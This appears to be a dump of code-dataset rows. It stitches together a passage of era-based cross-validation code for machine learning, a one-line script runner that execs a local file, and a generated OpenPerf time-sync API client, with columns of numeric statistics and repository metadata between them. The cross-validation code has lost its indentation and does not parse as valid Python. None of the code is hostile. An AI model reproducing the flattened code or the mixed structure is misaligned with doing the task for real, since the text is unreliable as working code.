# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
x_g_valid = x_g[valid_index]
self.trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
if return_train_index:
yield x_train, y_train, w_train, e_train, x_g_train, x_valid, \
y_valid, w_valid, e_valid, x_g_valid, train_index, valid_index, valid_era
else:
yield x_train, y_train, w_train, x_g_train, x_valid, \
y_valid, w_valid, x_g_valid, valid_index, valid_era
            # n_era is not an integer multiple of n_valid
else:
for i in range(n_traverse):
if i != n_traverse - 1:
if self.trained_cv:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
while any(set(valid_era) == i_cv for i_cv in self.trained_cv):
print('This CV split has been chosen, choosing another one...')
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
else:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
era_next = [rest for rest in era_idx[i] if rest not in valid_era]
era_idx.append(era_next)
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
x_g_train = x_g[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
x_g_valid = x_g[valid_index]
self.trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
if return_train_index:
yield x_train, y_train, w_train, e_train, x_g_train, x_valid, \
y_valid, w_valid, e_valid, x_g_valid, train_index, valid_index, valid_era
else:
yield x_train, y_train, w_train, x_g_train, x_valid, \
y_valid, w_valid, x_g_valid, valid_index, valid_era
else:
era_idx_else = [t for t in list(range(0, n_era)) if t not in era_idx[i]]
valid_era = era_idx[i] + list(
np.random.choice(era_idx_else, n_valid - n_rest, replace=False))
while any(set(valid_era) == i_cv for i_cv in self.trained_cv):
print('This CV split has been chosen, choosing another one...')
valid_era = era_idx[i] + list(
np.random.choice(era_idx_else, n_valid - n_rest, replace=False))
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
x_g_train = x_g[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
x_g_valid = x_g[valid_index]
self.trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
if return_train_index:
yield x_train, y_train, w_train, e_train, x_g_train, x_valid, \
y_valid, w_valid, e_valid, x_g_valid, train_index, valid_index, valid_era
else:
yield x_train, y_train, w_train, x_g_train, x_valid, \
y_valid, w_valid, x_g_valid, valid_index, valid_era
@staticmethod
def era_k_fold_balance(x, y, w, e, n_valid=None, n_cv=None, n_era=None, cv_seed=None, era_list=None):
if cv_seed is not None:
np.random.seed(cv_seed)
trained_cv = []
for i in range(n_cv):
if era_list is None:
era_list = range(0, n_era)
valid_era = np.random.choice(era_list, n_valid, replace=False)
while utils.check_bad_cv(trained_cv, valid_era):
valid_era = np.random.choice(era_list, n_valid, replace=False)
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
trained_cv.append(set(valid_era))
utils.print_cv_info(i+1, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
@staticmethod
def era_k_fold_all_random(x, y, w, e, n_valid=None, n_cv=None, n_era=None, cv_seed=None, era_list=None):
if cv_seed is not None:
np.random.seed(cv_seed)
trained_cv = []
for i in range(n_cv):
if era_list is None:
era_list = range(0, n_era)
valid_era = np.random.choice(era_list, n_valid, replace=False)
while any(set(valid_era) == i_cv for i_cv in trained_cv):
print('This CV split has been chosen, choosing another one...')
valid_era = np.random.choice(era_list, n_valid, replace=False)
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
trained_cv.append(set(valid_era))
utils.print_cv_info(i+1, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
@staticmethod
def era_k_fold_split_all_random(e, n_valid=None, n_cv=None, n_era=None, cv_seed=None, era_list=None):
if cv_seed is not None:
np.random.seed(cv_seed)
trained_cv = []
for i in range(n_cv):
if era_list is None:
era_list = range(0, n_era)
valid_era = np.random.choice(era_list, n_valid, replace=False)
while any(set(valid_era) == i_cv for i_cv in trained_cv):
print('This CV split has been chosen, choosing another one...')
valid_era = np.random.choice(era_list, n_valid, replace=False)
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
trained_cv.append(set(valid_era))
utils.print_cv_info(i+1, n_cv)
yield train_index, valid_index
@staticmethod
def forward_increase(x, y, w, e, n_valid=None, n_cv=None, n_era=None, cv_seed=None, valid_rate=None):
if cv_seed is not None:
np.random.seed(cv_seed)
# If valid_rate is provided, dynamically calculate n_valid
if valid_rate is not None:
n_valid_last = ceil(n_era*valid_rate)
else:
n_valid_last = n_valid
step = (n_era-n_valid_last)//n_cv
for i in range(n_cv):
valid_start = (i+1) * step
# If valid_rate is provided, dynamically calculate n_valid
if valid_rate is not None:
n_valid = ceil((valid_start*valid_rate)/(1-valid_rate))
if i == (n_cv - 1):
valid_stop = n_era
else:
valid_stop = valid_start + n_valid
print('======================================================')
print('Train Era: {}-{}'.format(0, valid_start-1))
print('Valid Era: {}-{}'.format(valid_start, valid_stop-1))
train_era = range(0, valid_start)
valid_era = list(range(valid_start, valid_stop))
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in train_era:
train_index.append(ii)
elif ele in valid_era:
valid_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
utils.print_cv_info(i+1, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
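    # Worked example (comment only, not from the original source): with
    # n_era=20, n_cv=3, n_valid=4 and valid_rate=None, step = (20 - 4) // 3 = 5,
    # yielding train/valid era windows 0-4 / 5-8, 0-9 / 10-13 and 0-14 / 15-19;
    # the last fold's validation window always extends to n_era.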
@staticmethod
def forward_window(x, y, w, e, n_valid=None, n_cv=None, n_era=None,
window_size=None, cv_seed=None, valid_rate=None, ensemble=False):
if cv_seed is not None:
np.random.seed(cv_seed)
if ensemble:
x_valid = utils.load_preprocessed_data(cfg.preprocessed_data_path)[4]
y_valid, w_valid, e_valid = utils.load_preprocessed_test_data(cfg.preprocessed_data_path)
else:
x_valid, y_valid, w_valid, e_valid = None, None, None, None
n_step = (n_era-window_size) // n_cv
if valid_rate is not None:
n_valid = ceil(window_size*valid_rate)
train_start = 0
for i in range(n_cv):
if ensemble:
if i == (n_cv - 1):
train_start = n_era - window_size
train_end = n_era
else:
train_end = train_start + window_size
print('======================================================')
print('Train Era: {}-{}'.format(train_start, train_end - 1))
train_era = list(range(train_start, train_end))
valid_era = list(set(e_valid))
train_index = []
for ii, ele in enumerate(e):
if ele in train_era:
train_index.append(ii)
np.random.shuffle(train_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
train_start += n_step
utils.print_cv_info(i + 1, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
else:
if i == (n_cv - 1):
train_start = n_era - window_size
train_end = n_era - n_valid
valid_stop = n_era
else:
train_end = train_start + window_size - n_valid
valid_stop = train_start + window_size
print('======================================================')
print('Train Era: {}-{}'.format(train_start, train_end - 1))
print('Valid Era: {}-{}'.format(train_end, valid_stop - 1))
train_era = list(range(train_start, train_end))
valid_era = list(range(train_end, valid_stop))
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in train_era:
train_index.append(ii)
elif ele in valid_era:
valid_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
train_start += n_step
utils.print_cv_info(i+1, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
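# Hedged usage sketch (illustrative only; shapes and era labels are assumed,
# and utils.print_cv_info is expected to exist as in the rest of this repo):
# import numpy as np
# x = np.random.rand(1000, 10)                  # features
# y = np.random.randint(0, 2, 1000)             # labels
# w = np.ones(1000)                             # sample weights
# e = np.random.randint(0, 20, 1000)            # era label per row
# folds = CrossValidation.era_k_fold(x, y, w, e, n_valid=4, n_cv=5,
#                                    n_era=20, cv_seed=42)
# for x_tr, y_tr, w_tr, e_tr, x_va, y_va, w_va, e_va, valid_era in folds:
#     pass  # fit a model on the training fold here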
| 36.393534
| 118
| 0.484485
| 3,996
| 32,645
| 3.649149
| 0.033784
| 0.082293
| 0.017282
| 0.037306
| 0.929502
| 0.907832
| 0.905569
| 0.894939
| 0.893293
| 0.884309
| 0
| 0.003685
| 0.434707
| 32,645
| 896
| 119
| 36.434152
| 0.786496
| 0.030816
| 0
| 0.898361
| 0
| 0
| 0.0279
| 0.00513
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021311
| false
| 0
| 0.011475
| 0
| 0.034426
| 0.062295
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1a04485d230a0956eb1b7c25af7e7d6987dc5d59
| 47
|
py
|
Python
|
runimportComposers.py
|
abilkus/NEA-2
|
150383aa79c66ad1d77c1a39315901c3db537253
|
[
"CC0-1.0"
] | null | null | null |
runimportComposers.py
|
abilkus/NEA-2
|
150383aa79c66ad1d77c1a39315901c3db537253
|
[
"CC0-1.0"
] | 5
|
2020-02-15T13:35:08.000Z
|
2021-06-10T18:23:14.000Z
|
runimportComposers.py
|
abilkus/NEA-2
|
150383aa79c66ad1d77c1a39315901c3db537253
|
[
"CC0-1.0"
] | null | null | null |
# Read and execute the import script in the current namespace, closing the
# file handle afterwards (the original one-liner left it open):
with open('scripts/importComposers.py') as f:
    exec(f.read())
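# An equivalent way to run the script (sketch, assuming the same relative path)
# is runpy, which manages the file handle and module namespace itself:
# import runpy
# runpy.run_path('scripts/importComposers.py')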
| 47
| 47
| 0.765957
| 6
| 47
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 47
| 1
| 47
| 47
| 0.765957
| 0
| 0
| 0
| 0
| 0
| 0.541667
| 0.541667
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1a175deca7f80cee3d8e76104fe89f666c95cb73
| 26,222
|
py
|
Python
|
tests/aat/api/v1/client/api/time_sync_api.py
|
DerangedMonkeyNinja/openperf
|
cde4dc6bf3687f0663c11e9e856e26a0dc2b1d16
|
[
"Apache-2.0"
] | 20
|
2019-12-04T01:28:52.000Z
|
2022-03-17T14:09:34.000Z
|
tests/aat/api/v1/client/api/time_sync_api.py
|
DerangedMonkeyNinja/openperf
|
cde4dc6bf3687f0663c11e9e856e26a0dc2b1d16
|
[
"Apache-2.0"
] | 115
|
2020-02-04T21:29:54.000Z
|
2022-02-17T13:33:51.000Z
|
tests/aat/api/v1/client/api/time_sync_api.py
|
DerangedMonkeyNinja/openperf
|
cde4dc6bf3687f0663c11e9e856e26a0dc2b1d16
|
[
"Apache-2.0"
] | 16
|
2019-12-03T16:41:18.000Z
|
2021-11-06T04:44:11.000Z
|
# coding: utf-8
"""
OpenPerf API
REST API interface for OpenPerf # noqa: E501
OpenAPI spec version: 1
Contact: support@spirent.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from client.api_client import ApiClient
class TimeSyncApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_time_source(self, timesource, **kwargs): # noqa: E501
"""Register a time source for time syncing. # noqa: E501
Registers a new time source for time syncing. Time sources are immutable. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_time_source(timesource, async_req=True)
>>> result = thread.get()
:param async_req bool
:param TimeSource timesource: New time source (required)
:return: TimeSource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_time_source_with_http_info(timesource, **kwargs) # noqa: E501
else:
(data) = self.create_time_source_with_http_info(timesource, **kwargs) # noqa: E501
return data
def create_time_source_with_http_info(self, timesource, **kwargs): # noqa: E501
"""Register a time source for time syncing. # noqa: E501
Registers a new time source for time syncing. Time sources are immutable. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_time_source_with_http_info(timesource, async_req=True)
>>> result = thread.get()
:param async_req bool
:param TimeSource timesource: New time source (required)
:return: TimeSource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['timesource'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_time_source" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'timesource' is set
if ('timesource' not in params or
params['timesource'] is None):
raise ValueError("Missing the required parameter `timesource` when calling `create_time_source`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'timesource' in params:
body_params = params['timesource']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/time-sources', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TimeSource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_time_source(self, id, **kwargs): # noqa: E501
"""Delete a time source # noqa: E501
Deletes an existing time source. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_time_source(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_time_source_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_time_source_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_time_source_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a time source # noqa: E501
Deletes an existing time source. Idempotent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_time_source_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_time_source" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_time_source`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/time-sources/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_time_counter(self, id, **kwargs): # noqa: E501
"""Get a time counter # noqa: E501
Returns a time counter, by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_time_counter(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: TimeCounter
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_time_counter_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_time_counter_with_http_info(id, **kwargs) # noqa: E501
return data
def get_time_counter_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a time counter # noqa: E501
Returns a time counter, by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_time_counter_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: TimeCounter
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_time_counter" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_time_counter`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/time-counters/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TimeCounter', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_time_keeper(self, **kwargs): # noqa: E501
"""Get a time keeper. # noqa: E501
Returns the system time keeper, aka clock. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_time_keeper(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: TimeKeeper
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_time_keeper_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_time_keeper_with_http_info(**kwargs) # noqa: E501
return data
def get_time_keeper_with_http_info(self, **kwargs): # noqa: E501
"""Get a time keeper. # noqa: E501
Returns the system time keeper, aka clock. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_time_keeper_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: TimeKeeper
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_time_keeper" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/time-keeper', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TimeKeeper', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_time_source(self, id, **kwargs): # noqa: E501
"""Get a time source # noqa: E501
Get a time source, by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_time_source(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: TimeSource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_time_source_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_time_source_with_http_info(id, **kwargs) # noqa: E501
return data
def get_time_source_with_http_info(self, id, **kwargs): # noqa: E501
"""Get a time source # noqa: E501
Get a time source, by id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_time_source_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: Unique resource identifier (required)
:return: TimeSource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_time_source" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_time_source`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/time-sources/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TimeSource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_time_counters(self, **kwargs): # noqa: E501
"""List time counters # noqa: E501
The `time-counters` endpoint returns all local time counters that are available for measuring the passage of time. This list is for informational purposes only. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_time_counters(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[TimeCounter]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_time_counters_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_time_counters_with_http_info(**kwargs) # noqa: E501
return data
def list_time_counters_with_http_info(self, **kwargs): # noqa: E501
"""List time counters # noqa: E501
The `time-counters` endpoint returns all local time counters that are available for measuring the passage of time. This list is for informational purposes only. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_time_counters_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[TimeCounter]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_time_counters" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/time-counters', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TimeCounter]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_time_sources(self, **kwargs): # noqa: E501
"""List reference clocks # noqa: E501
The `time-sources` endpoint returns all time sources that are used for syncing the local time. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_time_sources(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[TimeSource]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_time_sources_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_time_sources_with_http_info(**kwargs) # noqa: E501
return data
def list_time_sources_with_http_info(self, **kwargs): # noqa: E501
"""List reference clocks # noqa: E501
The `time-sources` endpoint returns all time sources that are used for syncing the local time. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_time_sources_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[TimeSource]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_time_sources" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/time-sources', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[TimeSource]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
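# Hedged usage sketch (not part of the generated file; assumes an OpenPerf
# instance reachable through the default ApiClient configuration):
# from client.api_client import ApiClient
# api = TimeSyncApi(ApiClient())
# keeper = api.get_time_keeper()                # synchronous call
# thread = api.list_time_sources(async_req=True)
# sources = thread.get()                        # resolve the async request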
| 37.247159
| 184
| 0.601175
| 3,017
| 26,222
| 4.97713
| 0.060325
| 0.056473
| 0.026105
| 0.033564
| 0.954315
| 0.95305
| 0.947523
| 0.939798
| 0.933338
| 0.931939
| 0
| 0.017924
| 0.30852
| 26,222
| 703
| 185
| 37.300142
| 0.810225
| 0.33552
| 0
| 0.806452
| 1
| 0
| 0.160627
| 0.028864
| 0
| 0
| 0
